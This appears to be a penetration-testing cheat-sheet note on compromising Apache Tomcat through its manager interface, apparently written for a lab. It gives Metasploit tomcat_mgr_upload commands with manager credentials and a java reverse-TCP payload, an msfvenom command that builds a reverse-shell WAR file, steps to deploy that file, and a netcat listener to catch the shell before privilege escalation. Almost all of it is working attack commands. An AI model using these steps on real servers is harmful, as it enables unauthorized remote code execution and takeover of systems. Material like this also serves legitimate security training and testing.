# Tomcat

msf5 auxiliary(scanner/http/tomcat\_mgr\_login) > use exploit/multi/http/tomcat\_mgr\_upload \
options \
set RHOSTS 172.16.64.101 \
set RPORT 8080 \
set HttpUsername tomcat \
set HttpPassword s3cret \
show payloads \
java/shell\_reverse\_tcp \
set payload java/shell\_reverse\_tcp \
set lhost 172.16.64.14 \
set lport 4444 \
run \
id

manually with MsfVenom msfvenom -p java/shell\_reverse\_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war\
\
above command, the -p flag specifies the payload, lhost is the IP address of our local machine, lport is the listening port on our machine, the -f flag specifies the desired format, and the -o flag is the name of the output file.\
\
tomcat manager link \
scroll down to deploy section and browse to the WAR file just created. Click the deploy Start listener \
nc -lvnp 4321 \
if everything worked correctly, we should see a connection open on our netcat listener at this point is to escalate privileges\ <br>